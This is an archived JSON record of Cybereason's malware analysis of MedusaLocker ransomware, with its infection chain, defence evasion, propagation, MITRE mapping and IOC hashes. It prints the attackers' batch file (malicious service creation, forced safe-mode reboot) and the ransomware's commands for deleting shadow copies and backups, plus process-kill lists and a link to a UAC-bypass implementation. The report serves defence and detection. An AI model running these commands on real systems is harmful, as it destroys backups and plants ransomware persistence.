{
	"id": "fb17ab41-dae6-4014-9b92-10ba257bf2f7",
	"created_at": "2026-04-06T00:06:54.212266Z",
	"updated_at": "2026-04-10T13:12:53.310343Z",
	"deleted_at": null,
	"sha1_hash": "6629c6c6e4f35664e4f3aeb65ed487a98b82c896",
	"title": "Cybereason vs. MedusaLocker Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1440341,
	"plain_text": "Cybereason vs. MedusaLocker Ransomware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 15:15:25 UTC\r\nResearch by: Tom Fakterman and Assaf Dahan\r\nBackground\r\nThe MedusaLocker ransomware first emerged in September 2019, infecting and encrypting Windows machines around the\r\nworld. There have been reports of MedusaLocker attacks across multiple industries, especially the healthcare industry which\r\nsuffered a great deal of ransomware attacks during the COVID-19 pandemic.\r\nIn order to maximize the chances of successful encryption of the files on the compromised machine, MedusaLocker restarts\r\nthe machine in safe mode before execution. This method is used to avoid security tools that might not run when the\r\ncomputer starts in safe mode.\r\nMedusaLocker avoids encrypting executable files, most likely to avoid rendering the targeted system unusable for paying\r\nthe ransom. To make it even more dangerous, MedusaLocker uses a combination of AES and RSA-2048, making the\r\nprocedure of brute forcing the encryption practically impossible.\r\nRecently, there have been reports stating that AKO, a variant of MedusaLocker, added an element of blackmail, threatening\r\nto release stolen files publicly. This method of blackmail or extortion is starting to gain popularity in the ransomware market\r\nas reported by Cybereason earlier this year.\r\nAlthough data leak extortion threats have been found in some of MedusaLocker’s ransom notes, Cybereason did not observe\r\nevidence of information actually being exfiltrated by the MedusaLocker ransomware at the time of this research.\r\nCybereason Blocks MedusaLocker Ransomware\r\nKey Points\r\n1. High Severity: The Cybereason Nocturnus Team assesses the threat level as HIGH given the destructive potential of\r\nattack.\r\n2. Encrypting mapped drives: MedusaLocker encrypts shared network drives of adjacent machines on the network.\r\n3. Attempted extortion: The ransom note left by new MedusaLocker variants contains threats to publicly reveal stolen data\r\nif payments are not made.\r\n4. Detected and Prevented: Cybereason’s platform fully detects and prevents the MedusaLocker ransomware.\r\nBreaking Down the Attack\r\nMany MedusaLocker infections typically start with two files, a ‘batch’ file and a powershell script saved as a ‘txt’ file:\r\nqzy.bat\r\nqzy.txt\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 1 of 9\n\nContents of the Batch file\r\nThe qzy.bat file deployed by the attackers is designed to create persistence via a Windows Service. The service does the\r\nfollowing tasks:\r\n1. Executes a Powershell script that resides in C:\\Windows\\SysWOW6\\qzy.txt, which contains the Ransomware payload.\r\n2. Changes registry keys to allow the service to run in safe mode.\r\n3. Enforce restart in safe mode.\r\n4. Restart the infected host.\r\nsc create purebackup binpath= \"%COMSPEC% /C start /b\r\nC:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe -c $km =\r\n[IO.File]::ReadAllText('C:\\Windows\\SysWOW64\\qzy.txt'); IEX $km\" start= auto DisplayName= \"purebackup\"\r\nreg add HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\BackupLP /f\r\nreg add HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\BackupLP /ve /d \\\"Service\\\" /f\r\nbcdedit /set {default} safeboot minimal\r\nshutdown /r /f /t 00 \u0026 del %0\r\nThe batch file execution portrayed in Cybereason attack tree:\r\nMedusaLocker Batch file execution\r\nAfter the machine is restarted in safe mode, the created service executes and the powershell script runs. This powershell\r\nscript is a PowerSploit script known as “Invoke-ReflectivePEInjection”. The script reflectively loads the MedusaLocker\r\nransomware to the powershell process memory.\r\nThe MedusaLocker binary encoded with base64 in the script:\r\nPowershell script snippet\r\nMutex Detection\r\nThe first thing MedusaLocker does is to check if a process with the mutex “{8761ABBD-7F85-42EE-B272-\r\nA76179687C63}” exists on the machine. If the mutex already exists, the ransomware will stop its execution.\r\nCMSTP UAC BYPASS / Privilege Escalation\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 2 of 9\n\nMedusaLocker uses a known UAC bypass technique also used by other malware such as Trickbot that allows the\r\nransomware to run with escalated privileges that enable it to carry out administrative operations. It achieves privilege\r\nescalation by leveraging the built-in Windows tool CMSTP.exe to Bypass User Account Control and execute arbitrary\r\ncommands from a malicious INF through an auto-elevated COM interface. An implementation of that technique can be\r\nfound on Github: https://gist.github.com/hfiref0x/196af729106b780db1c73428b5a5d68d\r\nAn almost identical implementation of the above method was seen used in our analyzed samples:\r\nUAC bypass code in IDA\r\nPersistence\r\nMedusaLocker creates creates a copy of the malware executable in the path: “%AppData%\\Roaming\\svhost.exe”, or\r\n“%AppData%\\Roaming\\svchostt.exe” (depends on the malware variant). And then, creates persistence by a scheduled task\r\nnamed “svhost” which executes every 15 minutes:\r\nScheduled task in Cybereason\r\nBypassing Security Products\r\nMedusaLocker will attempt to disable or terminate certain process and security products:\r\nwxServer.exe,wxServerView,sqlservr.exe,sqlmangr.exe,RAgui.exe,supervise.exe,Culture.exe,RTVscan.exe,Defwatch.exe,sqlbrowser.exe,winword.exe,QB\r\nIn addition, it will attempt to disable the following services:\r\nwrapper,DefWatch,ccEvtMgr,ccSetMgr,SavRoam,sqlservr,sqlagent,sqladhlp,Culserver,RTVscan,sqlbrowser,SQLADHLP,QBIDPService,Intuit.QuickBoo\r\nusbarbitator64,vmware-converter,dbsrv12,dbeng8\r\nDeleting Backups and Preventing Recovery\r\nMedusaLocker uses the following hardcoded commands to remove backups in order to foil any recovery attempts:\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 3 of 9\n\nHardcoded commands in the malware\r\nCommand\r\nPurpose\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nDeleting all shadow copy volumes\r\nbcdedit.exe /set {default} recoveryenabled No\r\nDisabling Automatic Startup Repair\r\nbcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nDisabling Windows Error Recovery on startup\r\nwbadmin DELETE SYSTEMSTATEBACKUP\r\nDeleting backup for Windows Server\r\nwbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest\r\nDeleting the oldest backup on Windows Server\r\nMedusaLocker execution in the memory of powersehll.exe:\r\nMedusaLocker execution from Powershell\r\nScanning and Propagating to Remote Machines\r\nAfter a successful infection, the MedusaLocker will scan the entire subnet in order to detect other hosts and shared folders.\r\nThe ransomware edits the value “EnableLinkedConnections” of the following registry key:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CurrentVersion\\Policies\\System\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 4 of 9\n\n“EnableLinkedConnections” value is changed\r\nIt does that so it can connect to other adjacent hosts residing on the same network, and in addition, tries to ping the entire\r\nsubnet to see which hosts are alive:\r\nPing sweep to find live hosts\r\nEncryption Whitelist Folders\r\nMedusaLocker avoids encrypting executable files as well as taking a whitelisting approach, and encrypts files in most\r\nfolders with the exception of:\r\n%User Profile%\\AppData\r\n\\ProgramData\r\n\\Program Files\r\n\\Program Files (x86)\r\n\\AppData\r\n\\Application Data\r\n\\intel\r\n\\nvidia\r\n\\Users\\All Users\r\n\\Windows\r\nRansom Note\r\nAlthough the ransom note of MeduzaLocker states that data has been exfiltrated, we have not observed indications of such\r\nbehavior at the moment by the malware:\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 5 of 9\n\nRansom note\r\nCybereason Detection and Prevention\r\nCybereason is able to both detect and prevent the execution of MedusaLocker using the powershell protection component:\r\nMalicious powershell script prevented\r\nAdditionally, when the Anti-Ransomware feature is enabled, behavioral detection techniques in the platform are able to\r\ndetect the deletion of the shadow copies using vssadmin.exe, which will create a Malop for the ransomware behaviour:\r\nRansomware prevented\r\nMitre Att\u0026ck Breakdown\r\nExecution Persistence\r\nPrivilege\r\nEscalation\r\nDefense Evasion Lateral Movement Impact\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 6 of 9\n\nWindows\r\nCommand Shell\r\nWindows\r\nService\r\nBypass User\r\nAccess Control\r\nDynamic-link\r\nLibrary Injection\r\nSMB/Windows\r\nAdmin Shares\r\nData Encrypted\r\nfor Impact\r\nPowershell\r\nScheduled\r\nTask\r\n       \r\nIOCs\r\nMedusaLocker Executables\r\nSHA-256\r\n4ae110bb89ddcc45bb2c4e980794195ee5eb85b5261799caedef7334f0f57cc4\r\na8b84ab6489fde1fab987df27508abd7d4b30d06ab854b5fda37a277e89a2558\r\n7593b85e66e49f39feb3141b0d390ed9c660a227042686485131f4956e1f69ff\r\nbae48fe24d140f4c1c118edbfaee4ab6446c173a0d0b849585a88db3f38f01b8\r\nd90573cdf776f60a91dc57e8c77dd61adbdaaf205de29faf26afd138c520f487\r\ned139beb506a17843c6f4b631afdf5a41ec93121da66d142b412333e628b9db8\r\nd33b09ddee82c5c439cb0c66e5c1dee9ad5259e912a3979b31c66622fb9d47ea\r\n81ca80c8275b0fdfeef2a816a7bf567f8e9a145b03ab96138c527af5c79bbec2\r\nfb07649497b39eee0a93598ff66f14a1f7625f2b6d4c30d8bb5c48de848cd4f2\r\n678069f7847f4a839724fa8574b12619443bbfbc4d65d3d04c3f9aa1ba5fb37a\r\nd74e297ac85652d1f9c43ca98ff649d7770c155556ba94cf9e665ca645aded0c\r\n104ffe0cc10413b8c3dd04fdc921f07c3cc55efba9a63ccdccf45e4012151c5f\r\nabe330ec7e157293afee2d96489165d3aa0ed9a59252ecf4f3acfa3205ca9d15\r\n40fbb2f6850213af595dd27231b06c498f87e62b50e8b883976900cc1afa75e1\r\ne70a261143213e70ffa10643e17b5890443bd2b159527cd2c408dea989a17cfc\r\n9814f9d8a8b129d745d74d3069da69aaf4187146327cb615108e9ed1b5d3c58e\r\nfd24ff7e838fea836079c4554254768abdce32c4f46148c609a5a676c9e71103\r\nfc12de55f162cd0645e6f7299f6160d1a3b4c3a665efaf4f8bd891d8139d159e\r\nf30d2204814204a2295cd5c703591e81cdfe63ee04b0e45d7ed76fe0db4a711b\r\n8b9bdc5cf5534d377a6201d1803a5aa0915b93c9df524307118fd61f361bdba2\r\nb1672fd7ef5f4419f5c74a0829645087e92437f766042bfa3325a2a96610f271\r\naae247b1fe640f2c96cbfa508d18d475f3e4c8b29fa117a31d17ba0c4e5caa48\r\nb1e97cd1ae60622ae83c56c9d15895a24405f949e4bb337e86159bcdd93e138e\r\n8597f458f1dcc5ecdf209d9c98b1f72c2fce2486236a3ae73adbe26fb6f9c671\r\ne2c2a80cb4ecc511f30d72b3487cb9023b40a25f6bbe07a92f47230fb76544f4\r\n746c79b5b6030091c37251939690eee31d023de5303544b46032bf89580806e5\r\n590ea5fa2db24715d72c276c59434b38d21678d6dcabb41f0e370f6dc56ab26b\r\n50a334ff766b053dee01ee1e410eebc5a24144517c59f9317ec47be9b70f6c48\r\nSHA1\r\ne03aedb8b9770f899a29f1939636db43825e95cf\r\nc87cd85d434e358b85f94cad098aa1f653d9cdbf\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 7 of 9\n\n1bbda98348f0d8d58c6afccd50a76321d02919f9\r\n0c1ce8017cfcc24927fff1b00606e8c83c4ebfa7\r\n6abac524387a106f73d9ddb5d8a84cb72dad1cdd\r\n02a0ea73ccc55c0236aa1b4ab590f11787e3586e\r\n212e3254099967712c6690be11ae9d65a8966ffa\r\n4bc8175c5fbe088297ec4eb3fa26acd8927530e2\r\n86d92fc3ba2b3536893b8e753da9cbae70063a50\r\n2ac4359a7db288f07ed39f696e528cb379d2d979\r\n820d3dfe29368e3f16f2818e318805d78a6b7d3d\r\n7219f91bd5fb94128159d18956e1bd9132bf10e0\r\n855b8aeb4160641ecea5710174086ee74d3e42c1\r\ne5162ede86712df1e602cbf1ca8b205ab113a931\r\na35dd292647db3cb7bf60449732fc5f12162f39e\r\n7ad1bf03b480ebd2b85b2bc5be4b9140b0ce6d4d\r\neef59fd5b71487448bfd44270d909b1441cd537b\r\n69c1527fbd840eee87821328ecf1453984ddc73e\r\n0fe01b51818c6c7c1556bffb43976a5264b3cc43\r\nf3e66237577a690ee907deac9ffbf6074a85e7a5\r\nda237c7bad052c9cb99cbab75b8bc2bdb23b3f65\r\n0bcf20885b50d64a876e7b46497b22689cb93d33\r\n78bcffb9ee6a7d29e18f66c0138aa3fd3a9225fa\r\nfc31989737dcf21b73bc0956220852dfab2cb549\r\n3e5a80fe286834f6d5f0aaf014a420ec40ebad7d\r\nf968e5c2314e198f4c0c2a4596d13ee1b6482330\r\nb209dcdfdd030ae1944507fcd9ef0eaeabe22f21\r\n9f5a9707ba0fcd5b695be131dedfdfe3b2d359d9\r\nMedusaLocker Batch\r\nSHA-256\r\n26a11fada1464069571d4114a6fe1b31ccec1c6b34bcdad649d8892348a1cf60\r\n4f5540d21d741634a4685f4ee8b9fec238a1251428d482bbded4afcc7461dc38\r\nSHA1\r\n99ef68421489ed3c5a46c6746e85b225ef554ca0\r\nMedusaLocker Powershell Loader\r\nSHA-256\r\n5d4abf7721e27760bcac238c05ade2ccc5ee4a842ad3b488462b156a26c34407\r\n7af23ee3ad9d4822c371936037ff823a719c9ab877973e32690b0dadceb55792\r\nSHA1\r\n59c5977faf16b6abe18a177aa8979a0534b4425c\r\n283714fbd1cc3e54af1049f21397a83524a2f79f\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 8 of 9\n\nSource: https://www.cybereason.com/blog/medusalocker-ransomware\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/medusalocker-ransomware"
	],
	"report_names": [
		"medusalocker-ransomware"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434014,
	"ts_updated_at": 1775826773,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6629c6c6e4f35664e4f3aeb65ed487a98b82c896.pdf",
		"text": "https://archive.orkl.eu/6629c6c6e4f35664e4f3aeb65ed487a98b82c896.txt",
		"img": "https://archive.orkl.eu/6629c6c6e4f35664e4f3aeb65ed487a98b82c896.jpg"
	}
}